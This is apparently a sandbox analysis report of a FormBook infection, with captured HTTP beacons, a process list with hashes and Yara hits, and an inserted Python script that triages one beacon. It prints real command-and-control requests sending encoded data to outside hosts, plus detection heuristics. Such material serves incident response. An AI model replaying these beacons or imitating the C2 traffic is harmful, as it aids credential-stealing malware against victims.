                                                                Jan 11, 2025 09:15:43.839692116 CET | 492 | OUT | GET /zbqa/?UfjxuDP=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA9RQKtvF2RwQZX7jt+LR0GxdMQnQscMzB9kd5j+7KhxpY8qBrHtH6UUu4&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:44.449965954 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:44 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                13 | 192.168.2.7 | 49982 | 101.32.205.61 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:49.711334944 CET | 741 | OUT | POST /gtil/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                Origin: http://www.rwse6wjx.sbs
                                                                Referer: http://www.rwse6wjx.sbs/gtil/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 62 48 37 6d 30 31 74 36 36 6b 77 6e 59 50 59 46 33 48 39 6c 37 61 35 72 5a 76 47 6c 68 36 2f 6a 54 69 70 4d 47 78 35 6f 6a 7a 52 74 54 49 5a 53 49 37 31 45 58 4b 75 67 30 46 51 42 52 73 64 57 57 6a 74 67 67 67 65 6b 30 77 79 72 73 75 59 57 2f 48 39 47 56 52 6a 79 61 69 2b 77 45 51 6f 61 70 46 46 4d 2b 62 6d 6d 38 6b 53 49 61 6a 61 6a 67 56 50 30 30 79 7a 50 56 52 6f 35 4c 6d 4a 76 52 76 58 30 63 6b 64 2b 48 5a 44 41 68 55 54 77 66 48 73 64 77 4c 2b 76 4a 69 4b 65 69 73 50 41 59 6e 48 36 62 35 6c 58 6b 66 4d 33 2f 6f 52 42 59 71 68 46 75 4e 54 54 6d 4b 42 7a 42 39 4f 55 79 67 62 5a 51 3d 3d
                                                                Data Ascii: UfjxuDP=/wBbw28ri3wrEbH7m01t66kwnYPYF3H9l7a5rZvGlh6/jTipMGx5ojzRtTIZSI71EXKug0FQBRsdWWjtgggek0wyrsuYW/H9GVRjyai+wEQoapFFM+bmm8kSIajajgVP00yzPVRo5LmJvRvX0ckd+HZDAhUTwfHsdwL+vJiKeisPAYnH6b5lXkfM3/oRBYqhFuNTTmKBzB9OUygbZQ==
                                                                Jan 11, 2025 09:15:50.716609001 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:50 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                14 | 192.168.2.7 | 49983 | 101.32.205.61 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:52.269630909 CET | 761 | OUT | POST /gtil/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                Origin: http://www.rwse6wjx.sbs
                                                                Referer: http://www.rwse6wjx.sbs/gtil/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 37 33 37 67 58 64 74 7a 36 6b 76 6f 34 50 59 50 58 48 35 6c 37 47 35 72 59 72 6f 6c 54 65 2f 6a 79 53 70 50 46 70 35 70 6a 7a 52 31 44 49 63 64 6f 37 38 45 58 33 54 67 31 70 51 42 52 34 64 57 55 37 74 67 54 49 5a 2b 45 77 30 6d 4d 75 65 62 66 48 39 47 56 52 6a 79 61 48 5a 77 48 67 6f 61 59 31 46 4e 62 6e 6c 76 63 6b 52 50 61 6a 61 31 51 56 4c 30 30 79 72 50 55 64 47 35 4a 75 4a 76 51 66 58 30 4e 6b 65 30 48 5a 46 4e 42 56 34 32 2b 6d 49 58 43 43 4e 75 61 69 51 61 31 67 6f 4d 4f 6d 6c 67 35 31 4a 4a 31 6e 33 7a 39 4d 6e 57 2b 33 55 48 76 4a 4c 65 45 2b 67 73 32 59 6b 5a 67 42 66 50 6f 6d 73 4b 6a 30 46 61 69 71 6d 4b 6a 69 4a 67 44 51 61 7a 47 4d 3d
                                                                Data Ascii: UfjxuDP=/wBbw28ri3wrE737gXdtz6kvo4PYPXH5l7G5rYrolTe/jySpPFp5pjzR1DIcdo78EX3Tg1pQBR4dWU7tgTIZ+Ew0mMuebfH9GVRjyaHZwHgoaY1FNbnlvckRPaja1QVL00yrPUdG5JuJvQfX0Nke0HZFNBV42+mIXCCNuaiQa1goMOmlg51JJ1n3z9MnW+3UHvJLeE+gs2YkZgBfPomsKj0FaiqmKjiJgDQazGM=
                                                                Jan 11, 2025 09:15:53.501966000 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:53 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                15 | 192.168.2.7 | 49984 | 101.32.205.61 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:54.844646931 CET | 1774 | OUT | POST /gtil/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                Origin: http://www.rwse6wjx.sbs
                                                                Referer: http://www.rwse6wjx.sbs/gtil/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 37 33 37 67 58 64 74 7a 36 6b 76 6f 34 50 59 50 58 48 35 6c 37 47 35 72 59 72 6f 6c 54 57 2f 69 41 61 70 50 6b 70 35 76 54 7a 52 38 6a 49 64 64 6f 36 38 45 54 6a 58 67 31 56 75 42 54 41 64 58 31 62 74 33 53 49 5a 72 55 77 30 76 73 75 66 57 2f 47 39 47 56 42 6e 79 61 58 5a 77 48 67 6f 61 61 74 46 62 2b 62 6c 70 63 6b 53 49 61 6a 47 6a 67 56 7a 30 31 61 37 50 55 4a 34 34 34 4f 4a 76 77 50 58 31 2f 4d 65 70 33 5a 48 4f 42 56 67 32 2b 71 58 58 43 66 32 75 5a 2b 32 61 79 73 6f 4f 6f 4b 2b 31 62 78 4a 52 57 2f 66 31 4d 41 47 47 74 48 34 4a 65 4e 43 66 47 53 73 67 55 55 44 59 43 31 72 43 2b 37 55 56 42 4d 4a 58 67 4b 4c 47 6a 50 79 6b 52 77 53 6e 44 34 41 42 75 67 68 5a 41 6f 77 74 63 36 46 4d 2b 51 4c 45 35 68 39 42 4a 4e 4b 35 4a 52 59 32 75 7a 42 58 7a 74 67 6a 54 39 6d 46 76 68 48 54 48 6c 62 6b 4f 48 6b 73 31 46 51 58 4b 58 33 6f 78 66 71 2f 74 2f 33 75 4d 49 49 38 5a 39 74 62 45 48 74 63 38 44 79 46 50 54 7a 47 49 56 6d 6f 52 74 67 6c 53 [TRUNCATED]
                                                                Data Ascii: UfjxuDP=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 [TRUNCATED]
                                                                Jan 11, 2025 09:15:55.731194973 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:55 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.7 | 49985 | 101.32.205.61 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:15:57.388386011 CET | 487 | OUT | GET /gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5 HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.rwse6wjx.sbs
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:58.282186031 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                Server: Tengine
                                                                Date: Sat, 11 Jan 2025 08:15:58 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                17 | 192.168.2.7 | 49986 | 103.159.36.66 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:16:03.968719006 CET | 759 | OUT | POST /nfd2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                Origin: http://www.rokeyfashion.store
                                                                Referer: http://www.rokeyfashion.store/nfd2/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Ascii: UfjxuDP=AxQySsSYfODWpqLSDlQMd6rtRwtzShXi3/hseZz+zmG+mUNSCMOdprNItyNlcYLxeLVmSeD9Em5lWC6VrnlZfqcUi5gHNPDXjPpMyClhgBv5N83lCPcbEEo1uPqrwmKkowv2pQ2/mhAzHrmS9C5FtTFK13g1+TGfSQStoVSim8VDNuIQA1fFYIU/EXb2pTqS+Fv0taHZDoQfbIR1LA==
                                                                Jan 11, 2025 09:16:05.145494938 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-litespeed-tag: 2ea_HTTP.404
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"
                                                                x-litespeed-cache-control: no-cache
                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                transfer-encoding: chunked
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 08:16:04 GMT
                                                                server: LiteSpeed
                                                                Data: (brotli-compressed 404 page body; binary chunks omitted)


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                18 | 192.168.2.7 | 49987 | 103.159.36.66 | 80 | 3604 | C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:16:06.525942087 CET | 779 | OUT | POST /nfd2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                Origin: http://www.rokeyfashion.store
                                                                Referer: http://www.rokeyfashion.store/nfd2/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Ascii: UfjxuDP=AxQySsSYfODWv5jSPkQMV6rsVAtzYBXm3/tsebfuwVu+m2VSBNOdurNI5CMvR4LAeLpUSeP9EmdlWHeVrw5ae6cWqZgBVvDXjPpMyChHgBX5NMnlBucUaUoynvqr9GKgowuTpUvkmnEzHuaS8T5a4DFMonhE7hbzUi/WxDCUgdJhIYJyaXTpGZsEAV/A+13n8Ersg4z4cf11Wawxd9/3RbFGVF7mMhXmbI/YryM=
                                                                Jan 11, 2025 09:16:07.695336103 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-litespeed-tag: 2ea_HTTP.404
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"
                                                                x-litespeed-cache-control: no-cache
                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                transfer-encoding: chunked
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 08:16:07 GMT
                                                                server: LiteSpeed
                                                                Data: (brotli-compressed 404 page body; binary chunks omitted)


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                19 | 192.168.2.7 | 49988 | 103.159.36.66 | 80
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 09:16:09.566020966 CET | 1792 | OUT | POST /nfd2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                Origin: http://www.rokeyfashion.store
                                                                Referer: http://www.rokeyfashion.store/nfd2/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Ascii: UfjxuDP= [TRUNCATED]
                                                                Jan 11, 2025 09:16:10.742574930 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-litespeed-tag: 2ea_HTTP.404
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"
                                                                x-litespeed-cache-control: no-cache
                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                transfer-encoding: chunked
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 08:16:10 GMT
                                                                server: LiteSpeed
                                                                Data: (brotli-compressed 404 page body; binary chunks omitted)


Session ID:20
Source IP:192.168.2.7
Source Port:49989
Destination IP:103.159.36.66
Destination Port:80

Timestamp:Jan 11, 2025 09:16:12.105185032 CET
Bytes transferred:493
Direction:OUT
Data:
GET /nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
Host: www.rokeyfashion.store
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko

Timestamp:Jan 11, 2025 09:16:13.295727968 CET
Bytes transferred:526
Direction:IN
Data:
HTTP/1.1 301 Moved Permanently
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://rokeyfashion.store/nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS
x-litespeed-cache: miss
content-length: 0
date: Sat, 11 Jan 2025 08:16:13 GMT
server: LiteSpeed
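The outbound request in this session is the kind of record a responder pivots on: a short opaque path, two randomly named query parameters of which one carries a long base64-alphabet blob, and a browser-looking User-Agent. The script below is an added example, not part of the Joe Sandbox report: it re-parses the request text transcribed from the packet above, keeps the query values verbatim (form decoding would turn the '+' characters in the blob into spaces), and applies three illustrative heuristics whose names and thresholds are the example's own, not a vendor signature.

```python
"""Triage of the outbound request captured in session 20.

Added example, not part of the Joe Sandbox report. RAW_REQUEST is
transcribed from the packet shown above; the indicator heuristics and
their thresholds are illustrative and not a vendor signature.
"""
import re

# Transcribed from the report's outbound packet (session 20, 493 bytes).
RAW_REQUEST = (
    "GET /nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUT"
    "lgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVu"
    "OpC6xjiJx&LRJdx=qxGHfdRH_npdPLS HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,"
    "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n"
    "Accept-Language: en-us\r\n"
    "Connection: close\r\n"
    "Host: www.rokeyfashion.store\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko\r\n"
    "\r\n"
)

# Standard base64 alphabet with optional padding; '_' or '-' would not match.
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+=*")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, raw query pairs and headers.

    The query string is split by hand instead of with urllib.parse.parse_qsl:
    form decoding rewrites '+' as a space, which would corrupt the blob in the
    first parameter that we want to preserve byte for byte.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = []
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")
        params.append((key, value))
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "version": version, "path": path,
            "params": params, "headers": headers}


def beacon_indicators(req):
    """Names of the illustrative heuristics the request trips, in fixed order."""
    hits = []
    # A single short alphanumeric path segment such as /nfd2/ (constructed rule).
    if re.fullmatch(r"/[A-Za-z0-9]{2,8}/", req["path"]):
        hits.append("short_opaque_path")
    # At least one query value that is long and drawn only from the base64 alphabet.
    if any(len(v) >= 64 and B64_ALPHABET.fullmatch(v) for _, v in req["params"]):
        hits.append("base64_blob_in_query")
    # IE11-on-Windows-7 User-Agent string; compare against the host's real browser inventory.
    ua = req["headers"].get("user-agent", "")
    if "Trident/7.0" in ua and "Windows NT 6.1" in ua:
        hits.append("ie11_win7_user_agent")
    return hits


def pivot_fields(req):
    """Fields worth searching for across proxy logs and passive DNS."""
    host = req["headers"].get("host", "")
    apex = host[4:] if host.startswith("www.") else host
    return {"host": host, "apex": apex, "path": req["path"],
            "param_names": [k for k, _ in req["params"]]}


if __name__ == "__main__":
    request = parse_request(RAW_REQUEST)
    print(pivot_fields(request))
    print(beacon_indicators(request))
```

The apex domain is worth keeping alongside the www host: the 301 above was issued by WordPress and sends the same path and query string to http://rokeyfashion.store/, so proxy logs may show the beacon under either name.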



                                                                Target ID:0
                                                                Start time:03:14:02
                                                                Start date:11/01/2025
                                                                Path:C:\Users\user\Desktop\xaqnaB0rcW.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\xaqnaB0rcW.exe"
                                                                Imagebase:0x350000
                                                                File size:1'223'680 bytes
                                                                MD5 hash:DD5ACFFDE51EF27C585911DEA96C4336
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:03:14:02
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\xaqnaB0rcW.exe"
                                                                Imagebase:0x620000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:03:14:24
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe"
                                                                Imagebase:0xb90000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
